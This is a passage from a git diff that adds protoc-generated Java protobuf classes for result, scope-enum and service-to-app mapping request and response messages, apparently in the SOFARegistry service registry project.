getMessageBytes(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPbOuterClass.java new file mode 100644 index 000000000..ca6ae781c --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPbOuterClass.java @@ -0,0 +1,65 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class ResultPbOuterClass { + private ResultPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor internal_static_ResultPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_ResultPb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\016ResultPb.proto\",\n\010ResultPb\022\017\n\007success\030" + + "\001 \001(\010\022\017\n\007message\030\002 \001(\tB7\n/com.alipay.sof" + + "a.registry.common.model.client.pbP\001Z\002pbb" + + "\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] {}, assigner); + internal_static_ResultPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_ResultPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_ResultPb_descriptor, + new java.lang.String[] { + "Success", "Message", + }); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ScopeEnumPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ScopeEnumPb.java new file mode 100644 index 000000000..7dfcdbc0f --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ScopeEnumPb.java @@ -0,0 +1,108 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf enum {@code ScopeEnumPb} */ +public enum ScopeEnumPb implements com.google.protobuf.ProtocolMessageEnum { + /** zone = 0; */ + zone(0), + /** dataCenter = 1; */ + dataCenter(1), + /** global = 2; */ + global(2), + UNRECOGNIZED(-1), + ; + + /** zone = 0; */ + public static final int zone_VALUE = 0; + /** dataCenter = 1; */ + public static final int dataCenter_VALUE = 1; + /** global = 2; */ + public static final int global_VALUE = 2; + + public final int getNumber() { + if (this == UNRECOGNIZED) { + throw new java.lang.IllegalArgumentException( + "Can't get the number of an unknown enum value."); + } + return value; + } + + /** @deprecated Use {@link #forNumber(int)} instead. */ + @java.lang.Deprecated + public static ScopeEnumPb valueOf(int value) { + return forNumber(value); + } + + public static ScopeEnumPb forNumber(int value) { + switch (value) { + case 0: + return zone; + case 1: + return dataCenter; + case 2: + return global; + default: + return null; + } + } + + public static com.google.protobuf.Internal.EnumLiteMap internalGetValueMap() { + return internalValueMap; + } + + private static final com.google.protobuf.Internal.EnumLiteMap internalValueMap = + new com.google.protobuf.Internal.EnumLiteMap() { + public ScopeEnumPb findValueByNumber(int number) { + return ScopeEnumPb.forNumber(number); + } + }; + + public final com.google.protobuf.Descriptors.EnumValueDescriptor getValueDescriptor() { + return getDescriptor().getValues().get(ordinal()); + } + + public final com.google.protobuf.Descriptors.EnumDescriptor getDescriptorForType() { + return getDescriptor(); + } + + public static final com.google.protobuf.Descriptors.EnumDescriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.ScopeEnumPbOuterClass.getDescriptor() + .getEnumTypes() + .get(0); + } + + private static final ScopeEnumPb[] VALUES = values(); + + public static ScopeEnumPb valueOf(com.google.protobuf.Descriptors.EnumValueDescriptor desc) { + if (desc.getType() != getDescriptor()) { + throw new java.lang.IllegalArgumentException("EnumValueDescriptor is not for this type."); + } + if (desc.getIndex() == -1) { + return UNRECOGNIZED; + } + return VALUES[desc.getIndex()]; + } + + private final int value; + + private ScopeEnumPb(int value) { + this.value = value; + } + + // @@protoc_insertion_point(enum_scope:ScopeEnumPb) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ScopeEnumPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ScopeEnumPbOuterClass.java new file mode 100644 index 000000000..66996f27f --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ScopeEnumPbOuterClass.java @@ -0,0 +1,54 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class ScopeEnumPbOuterClass { + private ScopeEnumPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\021ScopeEnumPb.proto*3\n\013ScopeEnumPb\022\010\n\004zo" + + "ne\020\000\022\016\n\ndataCenter\020\001\022\n\n\006global\020\002B7\n/com." + + "alipay.sofa.registry.common.model.client" + + ".pbP\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] {}, assigner); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingRequest.java new file mode 100644 index 000000000..c90467396 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingRequest.java @@ -0,0 +1,567 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code ServiceAppMappingRequest} */ +public final class ServiceAppMappingRequest extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:ServiceAppMappingRequest) + ServiceAppMappingRequestOrBuilder { + private static final long serialVersionUID = 0L; + // Use ServiceAppMappingRequest.newBuilder() to construct. + private ServiceAppMappingRequest(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private ServiceAppMappingRequest() { + serviceIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private ServiceAppMappingRequest( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + if (!((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + serviceIds_ = new com.google.protobuf.LazyStringArrayList(); + mutable_bitField0_ |= 0x00000001; + } + serviceIds_.add(s); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + serviceIds_ = serviceIds_.getUnmodifiableView(); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingRequest_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingRequest_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest.class, + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest.Builder.class); + } + + public static final int SERVICEIDS_FIELD_NUMBER = 1; + private com.google.protobuf.LazyStringList serviceIds_; + /** repeated string serviceIds = 1; */ + public com.google.protobuf.ProtocolStringList getServiceIdsList() { + return serviceIds_; + } + /** repeated string serviceIds = 1; */ + public int getServiceIdsCount() { + return serviceIds_.size(); + } + /** repeated string serviceIds = 1; */ + public java.lang.String getServiceIds(int index) { + return serviceIds_.get(index); + } + /** repeated string serviceIds = 1; */ + public com.google.protobuf.ByteString getServiceIdsBytes(int index) { + return serviceIds_.getByteString(index); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + for (int i = 0; i < serviceIds_.size(); i++) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, serviceIds_.getRaw(i)); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + { + int dataSize = 0; + for (int i = 0; i < serviceIds_.size(); i++) { + dataSize += computeStringSizeNoTag(serviceIds_.getRaw(i)); + } + size += dataSize; + size += 1 * getServiceIdsList().size(); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj + instanceof com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest other = + (com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest) obj; + + boolean result = true; + result = result && getServiceIdsList().equals(other.getServiceIdsList()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (getServiceIdsCount() > 0) { + hash = (37 * hash) + SERVICEIDS_FIELD_NUMBER; + hash = (53 * hash) + getServiceIdsList().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code ServiceAppMappingRequest} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:ServiceAppMappingRequest) + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequestOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingRequest_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingRequest_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest.class, + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest.Builder + .class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + serviceIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000001); + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingRequest_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest build() { + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest result = + buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest result = + new com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest(this); + int from_bitField0_ = bitField0_; + if (((bitField0_ & 0x00000001) == 0x00000001)) { + serviceIds_ = serviceIds_.getUnmodifiableView(); + bitField0_ = (bitField0_ & ~0x00000001); + } + result.serviceIds_ = serviceIds_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other + instanceof com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest + .getDefaultInstance()) return this; + if (!other.serviceIds_.isEmpty()) { + if (serviceIds_.isEmpty()) { + serviceIds_ = other.serviceIds_; + bitField0_ = (bitField0_ & ~0x00000001); + } else { + ensureServiceIdsIsMutable(); + serviceIds_.addAll(other.serviceIds_); + } + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private com.google.protobuf.LazyStringList serviceIds_ = + com.google.protobuf.LazyStringArrayList.EMPTY; + + private void ensureServiceIdsIsMutable() { + if (!((bitField0_ & 0x00000001) == 0x00000001)) { + serviceIds_ = new com.google.protobuf.LazyStringArrayList(serviceIds_); + bitField0_ |= 0x00000001; + } + } + /** repeated string serviceIds = 1; */ + public com.google.protobuf.ProtocolStringList getServiceIdsList() { + return serviceIds_.getUnmodifiableView(); + } + /** repeated string serviceIds = 1; */ + public int getServiceIdsCount() { + return serviceIds_.size(); + } + /** repeated string serviceIds = 1; */ + public java.lang.String getServiceIds(int index) { + return serviceIds_.get(index); + } + /** repeated string serviceIds = 1; */ + public com.google.protobuf.ByteString getServiceIdsBytes(int index) { + return serviceIds_.getByteString(index); + } + /** repeated string serviceIds = 1; */ + public Builder setServiceIds(int index, java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureServiceIdsIsMutable(); + serviceIds_.set(index, value); + onChanged(); + return this; + } + /** repeated string serviceIds = 1; */ + public Builder addServiceIds(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureServiceIdsIsMutable(); + serviceIds_.add(value); + onChanged(); + return this; + } + /** repeated string serviceIds = 1; */ + public Builder addAllServiceIds(java.lang.Iterable values) { + ensureServiceIdsIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, serviceIds_); + onChanged(); + return this; + } + /** repeated string serviceIds = 1; */ + public Builder clearServiceIds() { + serviceIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000001); + onChanged(); + return this; + } + /** repeated string serviceIds = 1; */ + public Builder addServiceIdsBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + ensureServiceIdsIsMutable(); + serviceIds_.add(value); + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:ServiceAppMappingRequest) + } + + // @@protoc_insertion_point(class_scope:ServiceAppMappingRequest) + private static final com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = + new com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public ServiceAppMappingRequest parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new ServiceAppMappingRequest(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingRequestOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingRequestOrBuilder.java new file mode 100644 index 000000000..771c63757 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingRequestOrBuilder.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface ServiceAppMappingRequestOrBuilder + extends + // @@protoc_insertion_point(interface_extends:ServiceAppMappingRequest) + com.google.protobuf.MessageOrBuilder { + + /** repeated string serviceIds = 1; */ + java.util.List getServiceIdsList(); + /** repeated string serviceIds = 1; */ + int getServiceIdsCount(); + /** repeated string serviceIds = 1; */ + java.lang.String getServiceIds(int index); + /** repeated string serviceIds = 1; */ + com.google.protobuf.ByteString getServiceIdsBytes(int index); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingResponse.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingResponse.java new file mode 100644 index 000000000..c591153f0 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingResponse.java @@ -0,0 +1,856 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code ServiceAppMappingResponse} */ +public final class ServiceAppMappingResponse extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:ServiceAppMappingResponse) + ServiceAppMappingResponseOrBuilder { + private static final long serialVersionUID = 0L; + // Use ServiceAppMappingResponse.newBuilder() to construct. + private ServiceAppMappingResponse(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private ServiceAppMappingResponse() { + statusCode_ = 0; + message_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private ServiceAppMappingResponse( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + if (!((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + serviceAppMapping_ = + com.google.protobuf.MapField.newMapField( + ServiceAppMappingDefaultEntryHolder.defaultEntry); + mutable_bitField0_ |= 0x00000001; + } + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + serviceAppMapping__ = + input.readMessage( + ServiceAppMappingDefaultEntryHolder.defaultEntry.getParserForType(), + extensionRegistry); + serviceAppMapping_ + .getMutableMap() + .put(serviceAppMapping__.getKey(), serviceAppMapping__.getValue()); + break; + } + case 16: + { + statusCode_ = input.readInt32(); + break; + } + case 26: + { + java.lang.String s = input.readStringRequireUtf8(); + + message_ = s; + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + 